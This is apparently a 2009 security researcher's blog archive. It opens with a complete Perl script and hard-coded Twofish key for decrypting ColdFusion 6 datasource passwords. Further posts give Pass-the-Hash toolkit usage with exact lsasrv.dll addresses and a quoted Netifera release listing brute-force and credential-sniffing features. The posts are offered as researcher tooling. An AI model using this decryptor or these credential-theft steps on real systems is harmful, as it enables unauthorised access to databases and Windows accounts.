Thursday, October 22, 2009

How to decrypt Coldfusion v6 datasource passwords

Some time ago I made a blog post about how to decrypt datasource passwords for both ColdFusion v7 and v8 (see http://hexale.blogspot.com/2008/07/how-to-decrypt-coldfusion-datasource.html); this post covers the same thing for ColdFusion v6.

DataSource passwords in v6 are stored in \lib\neo-query.xml as they were in v7, but this time the passwords are encrypted with the Twofish algorithm using a hard-coded 16-byte key. Since the key is the same on every installation and ships inside cfusion.jar, anyone who can read neo-query.xml can recover the plaintext passwords; the file permissions on neo-query.xml are the only thing actually protecting them.

The code used to encrypt the passwords can be found in cfusion.jar: unzip the .jar file and look for \coldfusion\sql\TwoFishCryptor.class and \coldfusion\sql\TwoFish_Algorithm.class.

I wrote a quick Perl script to decrypt these passwords (it requires Crypt::Twofish, which you can easily install from CPAN or manually). Here it is:



#!/usr/bin/perl
# ColdFusion 6 neo-query.xml database passwords decryptor
# (c) Hernan Ochoa (hernan@gmail.com)

use strict;
use warnings;
use Crypt::Twofish;

# 16-byte hard-coded key used by coldfusion.sql.TwoFishCryptor
my $key = "\x56\xbc\xca\x37\x94\x81\xa6\x17\x09\x59\xfa\xdb\xcc\xfd\x40\x1a";

print "ColdFusion 6 neo-query.xml database passwords decryptor\n";
print "by Hernan Ochoa (hernan\@gmail.com)\n\n";

if (@ARGV != 1) {
print "syntax: decryptcf6.pl \n";
print "example: decryptcf6.pl AABBCCDDEEFF00010203040506070809\n";
print "\n";
exit 0;
}

# the encrypted password is stored in neo-query.xml as 32 hex characters
# (one 16-byte Twofish block)
my $data = $ARGV[0];
if ( $data !~ /^[0-9a-fA-F]{32}$/ ) {
print "ERROR: encrypted password must be 32 hex characters long!\n";
exit 0;
}

print "encrypted password: $data\n";

# convert the hex string into the 16 raw ciphertext bytes
my $mybytes = pack('H*', $data);

# single-block (ECB) Twofish decryption with the hard-coded key
my $cipher = Crypt::Twofish->new($key);

print "decrypted password: " . $cipher->decrypt($mybytes);
print "\n";



You can also download it here: http://www.hexale.org/tools/decryptcf6.tgz

Wednesday, October 21, 2009

List of Addresses for the Pass-the-Hash toolkit -a switch

Many people contact me asking for the correct addresses to use with the -a switch of whosthere.exe and iam.exe for different versions, languages, etc. of Windows.

Although I will continue answering these questions, I have put together a list of addresses for different versions of lsasrv.dll to make the process a little bit easier both for me and for you.

The list currently contains only a few addresses, but it will grow over time. Your contributions are very welcome, but please send me your lsasrv.dll along with the addresses, because I need to verify that the addresses are correct.

The file containing the list of addresses is very simple:

* 'sha1' is the SHA-1 hash of lsasrv.dll. This is used to identify different versions of the DLL.

* 'File version' and 'Language' are the version and language of lsasrv.dll.

* 'addresses' are the addresses to use with the -a switch.

So, basically, if you have a version of Windows where whosthere.exe and iam.exe are not working, first try iam-alt.exe and whosthere-alt.exe. If that doesn't work, or if you specifically want to use whosthere.exe and iam.exe, calculate the SHA-1 hash of your lsasrv.dll file (located in c:\windows\system32\lsasrv.dll) and look it up in the list of addresses.

If you can't find it there, just email me your lsasrv.dll. I'll answer with the correct addresses and will add them to the list.

You can find the list of addresses here: http://www.hexale.org/pth/pth_addrs.txt

Saturday, May 09, 2009

fix for whosthere/iam under XP SP3 with latest updates (May 2009)

In my last post I mentioned that whosthere/iam were no longer working with the latest updates for XP SP3 (but iam-alt/whosthere-alt were still working).

Ok, I actually forgot I had added the -a switch to the tools to easily overcome this scenario :).

The only thing you have to do is load lsasrv.dll into IDA and run the passthehash.idc script included in the toolkit's source package; it will give you back the addresses you need to make whosthere/iam work.

For XP SP3 English with the latest patches the values are the following:

75753BE0:7573FDF4:757D0C98:757D0CA0:757CFC60:757CFE54

so, just run

whosthere -a 75753BE0:7573FDF4:757D0C98:757D0CA0:757CFC60:757CFE54

or

iam.exe [other options...] -a 75753BE0:7573FDF4:757D0C98:757D0CA0:757CFC60:757CFE54

and both tools will work with the latest patches on XP SP3 English.

If you have a different version of Windows, just use the IDA .idc script or email me.

Wednesday, April 29, 2009

whosthere/iam not working with latest xp sp3 patches

Just wanted to give you a heads up:

whosthere.exe and iam.exe do not seem to work with all the latest patches for XP SP3 applied. I can't really say which patch caused the problem, and it doesn't matter that much anyway.

The problem is apparently that the tools just can't find the memory addresses they need, so I assume fixing the issue is simply a matter of modifying the heuristics used to find these addresses. I'm already looking at this issue and will release a new version soon.

Meanwhile, the '-alt' versions of the tools (whosthere-alt.exe and iam-alt.exe) still work; so, if you run into this problem, just use the -alt versions.

As always, feel free to email me if you have any other questions/problems.

Tuesday, April 07, 2009

Netifera Video - The Java Virtual Machine As Shellcode

Check this out, netifera is getting interesting:

"In this screencast we're going to look at some features we are working on for the next version of netifera.

The two main things we're going to demonstrate are geographical visualization and the netifera probe, which is a deployable software agent that makes it possible to run all netifera platform tools remotely as easily as running them locally.

We're going to install the probe on the netifera.com webserver, and we'll deploy it like shellcode by injecting it directly into memory over the network, using an exploit."

The video and more information are available at:
http://blog.netifera.com

Direct link to the video:
http://blog.netifera.com/video-the-java-virtual-machine-as-shellcode/

Friday, March 27, 2009

Netifera v1.0 released!

Check out the new version of Netifera! v1.0 has been released!

Here is a description of the new features of this release:

Netifera is a new modular open source platform for creating network
security tools. This project provides many advantages for both
security developers and researchers who want to implement new tools as
well as the community of users of these tools.

http://netifera.com/download

Tools

* Full IPv6 support
* TCP and UDP network scanning
* Service detection
* Operating system identification
* Reverse DNS scanning
* DNS name brute forcing
* DNS zone transfer information gathering
* Geographical information about network addresses
* Authentication brute force attack (against HTTP, FTP, IMAP and POP3)
* Web crawler discovers applications, collects email addresses and
adds the site structure to the model
* Integrated terminal for connecting to and interacting with network services

Passive Tools

* Modular packet capture service
* Capture packets on multiple interfaces simultaneously
* Parse 'pcap' format capture files as input to sniffing modules
* HTTP traffic analysis
* DNS information gathering from captured responses
* Network stack fingerprinting
* Service detection from captured banners and protocol packets
* Client application detection
* Credential sniffing for many protocols

Data Model

All information discovered by the netifera platform is persistently
stored in a workspace database. Our extension design allows for
developers to easily create their own data types and integrate them
into the platform.

User Interface

The platform provides an intuitive and professional quality graphical
user interface for using the tools written for our platform and
navigating the information they produce. Different tasks in our
application, such as sniffing information from the network, actively
collecting information by scanning networks, or exploring the local
environment of a remotely deployed probe (coming soon!), each have a
specialized configuration of the user interface called a 'perspective'.

Programming API

The netifera platform brings together high quality programming APIs
for tasks such as:

* High performance asynchronous socket connection and communication
* Link level packet capture and raw socket injection
* 802.11 monitor mode packet capture and injection (coming soon!)
* Network protocol header construction and analysis (ethernet, ip, tcp, etc...)
* Application layer protocol libraries (http, dns, ftp, etc...)

Download netifera 1.0 for Linux and Mac OS X from:

http://netifera.com/download

* Important * Remove older versions before installing
If you have any previous version installed, you must delete the entire
directory (or move it out of the way) before installing this version.
This version is not compatible with the workspaces created with
previous beta versions, so you should remove the .netifera folder from your home
directory (rm -rf ~/.netifera).

Contact us
We need your feedback to improve netifera. If you have bugs to report,
trace backs, screen captures of failures, .log files, or comments
about anything that annoys you while using netifera send them to:

bugs@netifera.com

Thank you!

Friday, January 23, 2009

Microsoft wants to listen to music with me

I just installed Windows 7 Beta, ran Windows Media Player for the first time, and got the following dialog:


The default option is 'Recommended Settings', but I notice that it says 'send usage data from the Player to Microsoft', so I go 'nah..' and choose 'Custom settings' because it says 'Customize privacy,..'

I click 'Next' and the following dialog appears:


But mhmmm....I can't uncheck the 'I want to help make Microsoft software and services even better by sending Player usage data to Microsoft'...

I like it how they try to sell it to you... 'come on! help Microsoft make this software even better! helping is good! help! if you help you're a good person! heeeeeeeelp!' ...

I guess this is a 'conditioned' beta, you get to play with the software but only if you are willing to 'help'.. :) which is good, right? :)

It's a silly thing anyway, but I thought it was funny.